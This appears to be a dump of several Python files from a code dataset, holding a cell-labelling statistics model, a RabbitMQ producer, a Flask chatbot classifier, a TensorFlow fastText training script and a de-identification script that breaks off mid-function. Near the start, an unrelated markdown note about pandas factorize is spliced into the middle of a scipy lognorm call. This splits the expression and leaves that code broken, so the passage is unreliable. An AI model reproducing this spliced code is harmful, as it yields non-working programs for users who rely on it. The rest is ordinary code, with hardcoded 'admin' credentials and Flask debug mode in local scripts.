lognormal pdf with actual miu and sigma\n '''\n mu_tmp, sigma_tmp = self.log_params(mu, sigma)\n return sp.stats.lognorm.pdf(X, 
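map_features in preprocessing.py hand-rolls its value-to-integer codes with `dict(zip(...))`; pandas ships the same encoding as `factorize`, which also reports the category order. A quick equivalence check on a toy column (not the project's data):

```python
import pandas as pd

s = pd.Series(["red", "blue", "red", "green"])

# Hand-rolled mapping, as in map_features: unique values -> 1..n
mapping = dict(zip(s.unique(), range(1, s.nunique() + 1)))
hand = s.map(mapping)

# pandas equivalent: factorize returns 0-based codes plus the categories
codes, cats = pd.factorize(s)
print(hand.tolist())         # [1, 2, 1, 3]
print((codes + 1).tolist())  # [1, 2, 1, 3] -- same codes, shifted to 1-based
```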
s=sigma_tmp, scale = np.exp(mu_tmp))\n\n def logn(self, sigma_cell,Tc,r,n):\n ''' def logn(t,sigma_cell,Tc,r):\n analytic solution for cell only noise\n '''\n mean,sigma = self.log_params(Tc,sigma_cell)\n la = np.log(self.times[n]/(1-r))\n idf = 0.5 * ( 1 + sp.special.erf( (mean - la) / (np.sqrt(2) * sigma) ) )\n int2 = 0.5 * np.exp( -mean + 0.5 * sigma * sigma ) * sp.special.erfc( ( -mean + sigma*sigma + la ) / (np.sqrt(2)*sigma) )\n return 1-1*idf+r*idf+self.times[n]*int2\n\n\n\n def pmf_f(self, Tc,r, GF, sigma_cell,sigma_sample):\n \"\"\" pmf for the number of labelled cells\n to test: using epsabs=0.1 and epsrel=0.1 in quad might significantly\n speed up the computation without loosing too much precision\n \"\"\"\n self.Tc = Tc\n self.r = r\n self.GF = GF\n self.sigma_cell = sigma_cell\n self.sigma_sample = sigma_sample\n\n #P =[sp.integrate.quadrature(self.f, 0.0001, Tc+(sigma_sample*10),args=([i]),tol=1.48e-08, rtol=1.48e-08)[0] for i in range(self.datalen)]\n #P = [sp.integrate.fixed_quad(self.f, 0.0001, Tc+(sigma_sample*10),n=100,args=([i]))[0] for i in range(self.datalen)]\n P = [sp.integrate.fixed_quad(self.f, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10),n=200,args=([i]))[0] for i in range(self.datalen)]\n return np.array(P)\n\n def f(self, TC_,n):\n return sp.stats.binom.pmf(self.data[n], self.ncell[n], self.GF*self.logn(self.sigma_cell,TC_,self.r,n) ) * self.pdf_LN(TC_, self.Tc, self.sigma_sample)\n \n \nclass dist:\n ''' distribution for the asymetric labelling assay '''\n\n def __init__(self):\n pass\n\n def log_params(self, mu, sigma):\n \"\"\" A transformation of paramteres such that mu and sigma are the \n mean and variance of the log-normal distribution and not of\n the underlying normal distribution.\n \"\"\"\n s2 = np.log(1.0 + sigma**2/mu**2)\n m = np.log(mu) - 0.5 * s2\n s = np.sqrt(s2)\n return m, s\n\n def pdf_LN(self, X, mu, sigma):\n ''' lognormal pdf with actual miu and sigma\n '''\n mu_tmp, sigma_tmp = self.log_params(mu, sigma)\n return sp.stats.lognorm.pdf(X, s=sigma_tmp, scale = np.exp(mu_tmp))\n\n def logn(self, sigma_cell,Tc,r):\n ''' def logn(t,sigma_cell,Tc,r):\n analytic solution for cell only noise\n '''\n mean,sigma = self.log_params(Tc,sigma_cell)\n la = np.log(self.t/(1-r))\n idf = 0.5 * ( 1 + sp.special.erf( (mean - la) / (np.sqrt(2) * sigma) ) )\n int2 = 0.5 * np.exp( -mean + 0.5 * sigma * sigma ) * sp.special.erfc( ( -mean + sigma*sigma + la ) / (np.sqrt(2)*sigma) )\n return 1-1*idf+r*idf+self.t*int2\n\n\n\n def pmf_f(self,ncell,Tc,r, GF, sigma_cell,sigma_sample, t, x):\n \"\"\" pmf for the number of labelled cells\n \"\"\"\n self.ncell = ncell\n self.Tc = Tc\n self.r = r\n self.GF = GF\n self.sigma_cell = sigma_cell\n self.sigma_sample = sigma_sample\n self.t = t\n \n #P = sp.integrate.quadrature(self.f, 0.01, 11,args=([x]))[0] \n P = sp.integrate.fixed_quad(self.f, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10),n=200,args=([x]))[0]\n return P\n\n def f(self, TC_,x):\n return sp.stats.binom.pmf(x, self.ncell, self.GF*self.logn(self.sigma_cell,TC_,self.r) ) * self.pdf_LN(TC_, self.Tc, self.sigma_sample)\n\n def pmf_mean(self,ncell,Tc,r, GF, sigma_cell,sigma_sample, t):\n \"\"\" mean number of labelled cells\n \"\"\"\n self.ncell = ncell\n self.Tc = Tc\n self.r = r\n self.GF = GF\n self.sigma_cell = sigma_cell\n self.sigma_sample = sigma_sample\n self.t = t\n \n #P = sp.integrate.quadrature(self.fm, max(0.0001,Tc-(sigma_sample*5)), Tc+(sigma_sample*10))[0] \n P = sp.integrate.fixed_quad(self.fm, max(0.0001,Tc-(sigma_sample*5)), 
Tc+(sigma_sample*10),n=200)[0]\n return ncell*P\n\n\n def fm(self, TC_):\n return self.GF*self.logn(self.sigma_cell,TC_,self.r) * self.pdf_LN(TC_, self.Tc, self.sigma_sample)\n \n\n@np.vectorize\ndef cla_det_model(t, tc=0.2, f=0.3, GF=0.5, mode=1, **kwargs):\n \"\"\" Model for labeling assays in vivo.\n Based on Lefevre et al., 2013 and extended with an initial\n growth fraction.\n \n t ... time after start of labeling\n S ... absolute length of S-Phase\n G1 ... absolute length of G1-Phase\n G2M ... absolute length of G2-Phase and M-Phase\n rmode ... mean number of daughter cells after cell division remaining\n in the population\n GF ... initial growth fraction\n \n Lefevre, J., Marshall, D. J., Combes, A. N., Ju, A. L., Little, M. H.\n & Hamilton, N. A. (2013). Modelling cell turnover in a complex tissue\n during development. Journal of Theoretical Biology, 338, 66-79.\n \"\"\"\n r = mode\n TC = tc\n S = TC*f\n G2M = 0.5*(1-S)\n if G2M < 0:\n return sp.nan\n if S + G2M > TC:\n return sp.nan\n else:\n if r==1:\n if t < TC - S:\n return GF * (t + S) / TC\n else:\n return GF\n else:\n # calculate the growth fraction at time t\n g = ( ( GF * r ** (t / TC) ) / ( GF * r ** (t / TC) + (1 - GF) ) )\n if t < G2M:\n return g * ((r ** ( ( G2M + S ) / TC ) - r ** (( G2M - t ) / TC) ) / (r - 1.0) )\n elif t < TC - S:\n return g * (1.0 - ( r ** ( ( TC + G2M - t ) / TC ) - r ** ( ( G2M + S) / TC ) ) / (r - 1.0) )\n else:\n return g\n\n\n\n","sub_path":"backend/fit/clapy.py","file_name":"clapy.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"71290784","text":"\n\nfrom xai.brain.wordbase.nouns._axiom import _AXIOM\n\n#calss header\nclass _AXIOMS(_AXIOM, ):\n\tdef __init__(self,): \n\t\t_AXIOM.__init__(self)\n\t\tself.name = \"AXIOMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"axiom\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_axioms.py","file_name":"_axioms.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"23927268","text":"import pandas as pd\nimport const as ct\nimport csv_basic as cb\nimport os\n\nCSV_DIR = ct.CSV_DIR\nCSV_HEADER = ct.CSV_HEADER\nTRIAL_TIME_COLUMN = ct.TRIAL_TIME_COLUMN\nCOLUMN_NAME = ['file_name', 'trial_time']\nSAVE_DIR = ct.OUTPUT_DIR\nSAVE_FILENAME = ct.OUTPUT_FILENAME_TRIAL_TIME\n\n\n# cs読み込みに使用するクラス\nclass ReadCsv:\n def read_csv(self, path, names):\n return pd.read_csv(path, names=names)\n\n# pandasデータを読み込んで加工するために使用するクラス\nclass AbstructDataframe:\n def __init__(self, df, column):\n self.df = df[column]\n\nclass TrialDataframe(AbstructDataframe):\n def __init__(self, df, column=TRIAL_TIME_COLUMN):\n self.df = df[column]\n\n # trial_idを指定するとそれに対応したdfをindexを0から振り直して返す\n def extraction(self):\n df_ex = self.df.query('trial_time != 0').reset_index(drop=True)\n return df_ex\n\nif __name__ == \"__main__\":\n trial_time_data = cb.TrialTimeInfo(COLUMN_NAME)\n csv_filenames = os.listdir(CSV_DIR)\n for csv_filename in csv_filenames:\n csv_file = ReadCsv()\n trial_times = TrialDataframe(csv_file.read_csv(CSV_DIR + csv_filename, CSV_HEADER))\n trial_time_data.add_Dataframe(csv_filename, trial_times.extraction().mean()[\"trial_time\"])\n trial_time_data.write_Dataframe(SAVE_DIR + 
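The `log_params` transform used throughout clapy.py sets s^2 = ln(1 + sigma^2/mu^2) and m = ln(mu) - s^2/2, so that the log-normal's own mean and standard deviation come out as mu and sigma rather than those of the underlying normal. A quick numerical check against scipy (stand-alone sanity check, not part of the module):

```python
import numpy as np
import scipy.stats

def log_params(mu, sigma):
    """Same transform as clapy.log_params: moments of the log-normal itself."""
    s2 = np.log(1.0 + sigma**2 / mu**2)
    return np.log(mu) - 0.5 * s2, np.sqrt(s2)

m, s = log_params(mu=10.0, sigma=3.0)
dist = scipy.stats.lognorm(s=s, scale=np.exp(m))
print(dist.mean(), dist.std())  # ~10.0 and ~3.0: the requested moments come back
```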
SAVE_FILENAME)","sub_path":"app/src/trial_time.py","file_name":"trial_time.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"338451989","text":"# 生产者代码\nimport pika\n# pip install pika\n\n# 用户和密码\ncredentials = pika.PlainCredentials('admin', 'admin')\n\n# 虚拟队列需要指定参数 virtual_host,如果是默认的可以不填。\nparameters = pika.ConnectionParameters(host='localhost',\n port=5672,\n virtual_host='/',\n credentials=credentials)\n\n# 阻塞方法\nconnection = pika.BlockingConnection(parameters)\n\n# 建立信道\nchannel = connection.channel()\n\n# 声明消息队列(队列不存在就创建,存在就直接使用)\n# 如不存在自动创建\n# durable = True 队列持久化\nchannel.queue_declare(queue='task_queue', durable=True)\n\n# exchange 指定交换机\n# routing_key 指定队列名\nmessage = 'send message to taskqueue'\nchannel.basic_publish(exchange='',\n routing_key='task_queue',\n body=message,\n properties=pika.BasicProperties(delivery_mode=2)) # delivery_mode=2 消息持久化\n\n# 关闭与rabbitmq server的链接\nconnection.close()\n","sub_path":"week05/rebbitmq/一个生产者多个消费者/mod5_rabbit_taskqueue_pub.py","file_name":"mod5_rabbit_taskqueue_pub.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"627271286","text":"\nimport numpy as np\nimport time\nimport json\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\n# Copyright 2015 Google Inc. All Rights Reserved.\nimport logging\n\nfrom flask import Flask,request,Response\n\n\napp = Flask(__name__)\n\ndef classify(sentence, show_details=False):\n results = think(sentence, show_details)\n results = [[i,r] for i,r in enumerate(results) if r>ERROR_THRESHOLD ] \n results.sort(key=lambda x: x[1], reverse=True) \n return_results =[[classes[r[0]],r[1]] for r in results]\n print (return_results)\n return return_results\ndef sigmoid(x):\n output = 1/(1+np.exp(-x))\n return output\n\n# convert output of sigmoid function to its derivative\ndef sigmoid_output_to_derivative(output):\n return output*(1-output)\n \ndef clean_up_sentence(sentence):\n # tokenize the pattern\n sentence_words = nltk.word_tokenize(sentence)\n # stem each word\n sentence_words = [stemmer.stem(word.lower()) for word in sentence_words]\n return sentence_words\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\ndef bow(sentence, words, show_details=False):\n # tokenize the pattern\n sentence_words = clean_up_sentence(sentence)\n # bag of words\n bag = [0]*len(words) \n for s in sentence_words:\n for i,w in enumerate(words):\n if w == s: \n bag[i] = 1\n if show_details:\n print (\"found in bag: %s\" % w)\n\n return(np.array(bag))\n\ndef think(sentence, show_details=False):\n x = bow(sentence.lower(), words, show_details)\n if show_details:\n print (\"sentence:\", sentence, \"\\n bow:\", x)\n # input layer is our bag of words\n l0 = x\n # matrix multiplication of input and hidden layer\n l1 = sigmoid(np.dot(l0, synapse_0))\n # output layer\n l2 = sigmoid(np.dot(l1, synapse_1))\n return l2\n\n@app.route('/')\ndef hello():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n return 'Hello World!'\n\n\n@app.route('/api/v1/ChatbotAmadeus', methods=['POST'])\ndef Amadeus():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n data = request.get_json(silent=True)\n try:\n \tdeff = data[\"sentence\"]\n \tprediccion = classify(deff)\n \tif(len(prediccion)>=1):\n \t\tdata = {\n\t \t\t'intent' : prediccion[0][0],\n\t \t\t'score' : prediccion[0][1]\n \t\t}\n \t\tjs = json.dumps(data)\n 
\t\tresp = Response(js, status=200, mimetype='application/json')\n \t\treturn resp\n \telse:\n \t\tdata = {\n\t \t\t'intent' : None\n \t\t}\n \t\tjs = json.dumps(data)\n \t\tresp = Response(js, status=200, mimetype='application/json')\n \t\treturn resp\n except ValueError:\n \tdata = {\n \t\t'Message' : \"Request Incorrecto\"\n \t}\n \tjs = json.dumps(data)\n \tresp = Response(js, status=400, mimetype='application/json')\n \treturn resp\n\n\n@app.errorhandler(500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n \"\"\".format(e), 500\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n # [END app]\n stemmer = LancasterStemmer()\n global words \n global classes \n global synapse \n global synapse_0 \n global synapse_1 \n\n\n # probability threshold\n ERROR_THRESHOLD = 0.2\n # load our calculated synapse values\n synapse_file = 'synapses.json' \n with open(synapse_file) as data_file: \n synapse = json.load(data_file) \n synapse_0 = np.asarray(synapse['synapse0']) \n synapse_1 = np.asarray(synapse['synapse1'])\n words= np.asarray(synapse['words'])\n classes= np.asarray(synapse['classes']) \n app.run(host='127.0.0.1', port=8080, debug=True)\n\n# compute sigmoid nonlinearity\n\n\n","sub_path":"ANN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"229142989","text":"# -*- coding:utf-8 -*-\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport tensorflow as tf\nimport numpy as np\nfrom tqdm import tqdm\nimport os\nimport sys\nimport shutil\nimport time\nfrom nju.fasttext.network import Settings\nfrom nju.fasttext.network import Fasttext\nfrom nju.fasttext.judger import Judger\nfrom nju.fasttext.data_helpers import train_batch_predict\nimport logging\nimport datetime\n\n# sys.path.append('../..')\nfrom nju.fasttext.data_helpers import to_categorical_accu\nfrom nju.fasttext.data_helpers import to_categorical_law\nfrom nju.fasttext.data_helpers import to_categorical_time\n\n\nstrtime = time.strftime(\"%Y-%m-%d-%H-%M\", time.localtime())\n# log_name = \"../logs/\"+strtime+\"_fasttext_old.txt\"\n# log_name = \"../logs/\"+strtime+\"law_fasttext_newaug.txt\"\nlog_name = \"../logs/\"+strtime+\"accu_fasttext_new1aug.txt\"\nlogging.basicConfig(handlers=[logging.FileHandler(log_name, 'w+', 'utf-8')], format='%(asctime)s: %(levelname)s: %(message)s')\nlogging.root.setLevel(level=logging.INFO)\n\nflags = tf.flags\nflags.DEFINE_bool('is_retrain', False, 'if is_retrain is true, not rebuild the summary')\nflags.DEFINE_integer('max_epoch', 1, 'update the embedding after max_epoch, default: 1')\nflags.DEFINE_integer('max_max_epoch', 10, 'all training epoches, default: 6')\nflags.DEFINE_float('lr', 1e-3, 'initial learning rate, default: 1e-3')\nflags.DEFINE_float('decay_rate', 0.65, 'decay rate, default: 0.65')\nflags.DEFINE_float('keep_prob', 0.5, 'keep_prob for training, default: 0.5')\n# 正式\nflags.DEFINE_integer('decay_step', 8000, 'decay_step, default: 15000')\nflags.DEFINE_integer('valid_step', 6000, 'valid_step, default: 10000')\nflags.DEFINE_float('last_score', 0.5, 'if valid_score > last_score, save new model. 
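Given the Amadeus route above, the whole service is driven by one JSON field. A hypothetical client call (URL and port taken from the `app.run` line; `requests` is my choice of client, any HTTP library works):

```python
import requests  # assumed client library, not part of the service itself

resp = requests.post('http://127.0.0.1:8080/api/v1/ChatbotAmadeus',
                     json={'sentence': 'I want to book a flight'})
print(resp.status_code, resp.json())
# 200 with {'intent': ..., 'score': ...} when a class clears ERROR_THRESHOLD,
# otherwise {'intent': None}
```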
default: 0.75')\n\n# test settings\n# flags.DEFINE_integer('decay_step', 1000, 'decay_step, default: 1000')\n# flags.DEFINE_integer('valid_step', 500, 'valid_step, default: 500')\n# flags.DEFINE_float('last_f1', 0.10, 'if valid_f1 > last_f1, save new model. default: 0.10')\nFLAGS = flags.FLAGS\n\nlr = FLAGS.lr\nlast_score = FLAGS.last_score\nsettings = Settings()\n# jieb = settings.jieba_len\nsummary_path = settings.summary_path\nckpt_path = settings.ckpt_path\nmodel_path = ckpt_path + 'model.ckpt'\n\nbatch_path = '../data/predictbatch/new1/fasttext/'\nembedding_path = '../data/word_embedding.npy'\nwords_path = '../data/sr_word2id.pkl'\n# data_train_path = '../data/jieba-data/data_train/batch/accu/'\n# data_valid_path = '../data/jieba-data/data_valid/batch/accu/'\ndata_train_path = '../data/new1/jieba-data/aug/data_train/batch/accu/'\ndata_valid_path = '../data/new1/jieba-data/data_test/batch/accu/'\n# data_valid_path = '../data/new1/jieba-data/aug/data_valid/batch/accu/'\n# data_train_path = '../data/new1/jieba-data/aug/data_train/batch/law/'\n# # data_valid_path = '../data/new1/jieba-data/data_test/batch/law/'\n# data_valid_path = '../data/new1/jieba-data/aug/data_valid/batch/law/'\ntr_batches = os.listdir(data_train_path) # list of batch file names\nva_batches = os.listdir(data_valid_path)\nn_tr_batches = len(tr_batches)\nn_va_batches = len(va_batches)\n\n\naccusation_path = '../cail_0518/accu.txt'\nlaw_path = '../cail_0518/law.txt'\njudger = Judger(accusation_path,law_path)\n\n# test settings\n# n_tr_batches = 1000\n# n_va_batches = 50\n\n\ndef get_batch_old(data_path, batch_id):\n \"\"\"get a batch from data_path\"\"\"\n new_batch = np.load(data_path + str(batch_id) + '.npz')\n X_batch = new_batch['X']\n y_batch = new_batch['y']\n X1_batch = X_batch[:, :1]\n X2_batch = X_batch[:, 1:]\n return [X1_batch, X2_batch, y_batch]\n\ndef get_batch(data_path, batch_id):\n \"\"\"get a batch from data_path\"\"\"\n new_batch = np.load(data_path + str(batch_id) + '.npz')\n X_batch = new_batch['X']\n y_batch = new_batch['y']\n return [X_batch, y_batch]\n\n\ndef valid_epoch(data_path, sess, model):\n \"\"\"Test on the valid data.\"\"\"\n va_batches = os.listdir(data_path)\n n_va_batches = len(va_batches)\n _costs = 0.0\n marked_labels_list = list()\n y_pred_list = list()\n# n_va_batches = 10\n for i in range(n_va_batches):\n [X_batch, y_batch1] = get_batch(data_path, i)\n marked_labels_list.extend(y_batch1)\n y_batch = to_categorical_accu(y_batch1)# accusation label encoding\n# y_batch = to_categorical_law(y_batch1) # law-article label encoding\n# y_batch = to_categorical_time(y_batch1) # prison-term label encoding\n _batch_size = len(y_batch)\n fetches = [model.loss, model.y_pred, model.accuracy]\n feed_dict = {model.X_inputs: X_batch, model.y_inputs: y_batch,\n model.batch_size: _batch_size, model.tst: True, model.keep_prob: 1.0}\n _cost, predict_labels, _accuracy = sess.run(fetches, feed_dict)\n _costs += _cost # accumulate, otherwise the returned mean_cost is always zero\n y_pred_list.extend(predict_labels)\n# train_batch_predict(predict_labels,y_batch1, batch_path+'time/', i, batch_size=128)\n# train_batch_predict(predict_labels,y_batch1, batch_path+'law/', i, batch_size=128)\n train_batch_predict(predict_labels,y_batch1, batch_path+'accu/', i, batch_size=128)\n dictscore = {}\n maxscore = 0\n thresholdlist = [-0.80,-0.78,-0.76,0]\n for threshold in thresholdlist: \n predict_labels_list = list() # all predicted results \n for label in y_pred_list:\n xitem = np.argwhere(label>threshold).flatten()\n if(len(xitem)>0):\n predict_labels_list.append(xitem)\n else:\n predict_labels_list.append(label.argsort()[-1:-2:-1]) \n# print(len(predict_labels_list))\n# 
print(len(marked_labels_list))\n predict_label_and_marked_label_list = zip(predict_labels_list, marked_labels_list)\n score = judger.get_taskaccu_score(predict_label_and_marked_label_list) #罪名预测分数\n# score = judger.get_tasklaw_score(predict_label_and_marked_label_list) #法条预测分数\n# score = judger.get_tasktime_score(predict_label_and_marked_label_list) #刑期回归预测分数\n# score = judger.get_tasktime_class_score(predict_label_and_marked_label_list) #刑期分类预测分数\n dictscore[threshold] = score\n if(score > maxscore):\n maxscore = score\n# predict_labels_list.extend(list(predict_labels.flatten())) #刑期回归预测\n# predict_labels = map(lambda label: label.argsort()[-1:-2:-1], predict_labels) #刑期分类预测\n# predict_labels_list.extend(predict_labels)\n mean_cost = _costs / n_va_batches\n return mean_cost, dictscore, maxscore\n\n\ndef train_epoch(data_path, sess, model, train_fetches, valid_fetches, train_writer, test_writer):\n global last_score\n global lr\n time0 = time.time()\n batch_indexs = np.random.permutation(n_tr_batches) # shuffle the training data\n for batch in tqdm(range(n_tr_batches)):\n global_step = sess.run(model.global_step)\n if 0 == (global_step + 1) % FLAGS.valid_step:\n valid_cost, dictscore, score = valid_epoch(data_valid_path, sess, model)\n print('\\n')\n print('Global_step=%d: valid cost=%g; score=%g, time=%g s' % (\n global_step, valid_cost, score, time.time() - time0))\n logging.info('Global_step=%d: valid cost=%g; score=%g, time=%g s' % (\n global_step, valid_cost, score, time.time() - time0))\n for threshold,thresholdscore in dictscore.items():\n print('threshold=%g: score=%g ' % (threshold, thresholdscore))\n logging.info('threshold=%g: score=%g ' % ( threshold, thresholdscore))\n time0 = time.time()\n if score > last_score:\n last_score = score\n saving_path = model.saver.save(sess, model_path, global_step+1)\n print('\\n')\n print('saved new model to %s ' % saving_path)\n logging.info('saved new model to %s ' % saving_path)\n # training\n batch_id = batch_indexs[batch]\n [X_batch, y_batch] = get_batch(data_train_path, batch_id)\n y_batch = to_categorical_accu(y_batch) #罪名标签转换\n# y_batch = to_categorical_law(y_batch) #法条标签转换\n# y_batch = to_categorical_time(y_batch) #刑期标签转换\n _batch_size = len(y_batch)\n feed_dict = {model.X_inputs: X_batch, model.y_inputs: y_batch,\n model.batch_size: _batch_size, model.tst: False, model.keep_prob: FLAGS.keep_prob}\n summary, _cost, _accuracy, _, _ = sess.run(train_fetches, feed_dict) # the cost is the mean cost of one batch\n time_str = datetime.datetime.now().isoformat()\n# print(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n if 0 == (global_step + 1) % 200:\n logging.info(\"{}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n # valid per 500 steps\n if 0 == (global_step + 1) % 500:\n train_writer.add_summary(summary, global_step)\n batch_id = np.random.randint(0, n_va_batches) # 随机选一个验证batch\n [X_batch, y_batch] = get_batch(data_valid_path, batch_id)\n y_batch = to_categorical_accu(y_batch) #罪名标签转换\n# y_batch = to_categorical_law(y_batch) #法条标签转换\n# y_batch = to_categorical_time(y_batch) #刑期标签转换\n _batch_size = len(y_batch)\n feed_dict = {model.X_inputs: X_batch, model.y_inputs: y_batch,\n model.batch_size: _batch_size, model.tst: True, model.keep_prob: 1.0}\n summary, _cost, _accuracy = sess.run(valid_fetches, feed_dict)\n time_str = datetime.datetime.now().isoformat()\n# print(\"valid: {}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n 
logging.info(\"valid: {}: step {}, loss {:g}, acc {:g}\".format(time_str, global_step, _cost, _accuracy))\n test_writer.add_summary(summary, global_step)\n\n\ndef main(_):\n global ckpt_path\n global last_score\n if not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\n if not os.path.exists(summary_path):\n os.makedirs(summary_path)\n elif not FLAGS.is_retrain: # 重新训练本模型,删除以前的 summary\n shutil.rmtree(summary_path)\n os.makedirs(summary_path)\n if not os.path.exists(summary_path):\n os.makedirs(summary_path)\n\n print('1.Loading data...')\n logging.info('1.Loading data...')\n W_embedding = np.load(embedding_path)\n print('training sample_num = %d' % n_tr_batches)\n logging.info('training sample_num = %d' % n_tr_batches)\n print('valid sample_num = %d' % n_va_batches)\n logging.info('valid sample_num = %d' % n_va_batches)\n\n # Initial or restore the model\n print('2.Building model...')\n logging.info('2.Building model...')\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n model = Fasttext(W_embedding, settings)\n logging.info('word embedding path %s'%embedding_path)\n logging.info('text length = %d'%settings.jieba_len)\n logging.info('text length = %d'%settings.thulac_len)\n logging.info('train task class = %d'%settings.n_class)\n logging.info('model name %s'%settings.model_name)\n# logging.info('filter size = %s'%str(settings.filter_sizes))\n# logging.info('per filter size = %d'%settings.n_filter)\n with tf.variable_scope('training_ops') as vs:\n learning_rate = tf.train.exponential_decay(FLAGS.lr, model.global_step, FLAGS.decay_step,\n FLAGS.decay_rate, staircase=True)\n # two optimizer: op1, update embedding; op2, do not update embedding.\n with tf.variable_scope('Optimizer1'):\n tvars1 = tf.trainable_variables()\n grads1 = tf.gradients(model.loss, tvars1)\n optimizer1 = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op1 = optimizer1.apply_gradients(zip(grads1, tvars1),\n global_step=model.global_step)\n with tf.variable_scope('Optimizer2'):\n tvars2 = [tvar for tvar in tvars1 if 'embedding' not in tvar.name]\n grads2 = tf.gradients(model.loss, tvars2)\n optimizer2 = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op2 = optimizer2.apply_gradients(zip(grads2, tvars2),\n global_step=model.global_step)\n update_op = tf.group(*model.update_emas)\n merged = tf.summary.merge_all() # summary\n train_writer = tf.summary.FileWriter(summary_path + 'train', sess.graph)\n test_writer = tf.summary.FileWriter(summary_path + 'test')\n training_ops = [v for v in tf.global_variables() if v.name.startswith(vs.name+'/')]\n\n # 如果已经保存过模型,导入上次的模型\n if os.path.exists(ckpt_path + \"checkpoint\"):\n print(\"Restoring Variables from Checkpoint...\")\n logging.info(\"Restoring Variables from Checkpoint...\")\n model.saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))\n valid_cost, dictscore, score = valid_epoch(data_valid_path, sess, model)\n print('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost,score))\n logging.info('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost, score))\n for threshold,thresholdscore in dictscore.items():\n print('threshold=%g: score=%g ' % (threshold, thresholdscore))\n logging.info('threshold=%g: score=%g ' % ( threshold, thresholdscore))\n sess.run(tf.variables_initializer(training_ops))\n train_op2 = train_op1\n else:\n print('Initializing Variables...')\n logging.info('Initializing Variables...')\n 
sess.run(tf.global_variables_initializer())\n\n print('3.Begin training...')\n logging.info('3.Begin training...')\n print('max_epoch=%d, max_max_epoch=%d' % (FLAGS.max_epoch, FLAGS.max_max_epoch))\n logging.info('max_epoch=%d, max_max_epoch=%d' % (FLAGS.max_epoch, FLAGS.max_max_epoch))\n train_op = train_op2\n for epoch in range(FLAGS.max_max_epoch):\n global_step = sess.run(model.global_step)\n print('Global step %d, lr=%g' % (global_step, sess.run(learning_rate)))\n logging.info('Global step %d, lr=%g' % (global_step, sess.run(learning_rate)))\n if epoch == FLAGS.max_epoch: # update the embedding\n train_op = train_op1\n\n train_fetches = [merged, model.loss, model.accuracy, train_op, update_op]\n valid_fetches = [merged, model.loss, model.accuracy]\n train_epoch(data_train_path, sess, model, train_fetches, valid_fetches, train_writer, test_writer)\n # 最后再做一次验证\n valid_cost, dictscore, score = valid_epoch(data_valid_path, sess, model)\n print('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost,score))\n logging.info('Global_step=%d: valid cost=%g; score=%g' % (\n sess.run(model.global_step), valid_cost, score))\n for threshold,thresholdscore in dictscore.items():\n print('threshold=%g: score=%g ' % (threshold, thresholdscore))\n logging.info('threshold=%g: score=%g ' % ( threshold, thresholdscore))\n if score > last_score: # save the better model\n saving_path = model.saver.save(sess, model_path, sess.run(model.global_step)+1)\n print('saved new model to %s ' % saving_path)\n logging.info('saved new model to %s ' % saving_path)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"src/nju/fasttext/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"273438798","text":"#!/usr/bin/python3\n#\n# Author: Steve Landherr <landherr@cs.wisc.edu>\n#\n# Script to remove personally identifiable information (pii) from\n# comment submissions to FCC proceedings 17-108.\n#\n# JSON submission files are expected to be found under\n# ./FCC-SPAM-ECFS/ECFS_17-108_*/*.json\n#\n# Deidentified files are stored under ./deidentified, skipping any files\n# that already exist to permit restarting the script after interruption.\n\nimport glob\nimport hashlib\nimport json\nimport os\nimport sys\n\n\ndef usage():\n sys.stderr.write(\"usage: deidentify.py\")\n sys.exit(0)\n\n\ndef validate(key, value):\n \"\"\"\n Validate a particular element in the JSON data using custom code.\n Raises ValueError when validation fails.\n\n :param key: key of item being validated\n :param value: value found in submission\n :return: None\n \"\"\"\n if key == 'proceedings':\n if value == '17-108' or isinstance(value, list) and any([proceeding['name'] == '17-108'\n for proceeding in value]):\n return\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n\n\ndef sha256hash(key, value):\n \"\"\"\n Replace a particular element in the JSON data with the SHA256 hexdigest.\n\n :param key: key of the item being hashed\n :param value: value found in the submission\n :return: hexdigest of hashed value\n \"\"\"\n if not isinstance(value, str):\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n if not value:\n return value\n return hashlib.sha256(value.encode('ascii', 'xmlcharrefreplace')).hexdigest()\n\n\ndef md5hash(key, value):\n 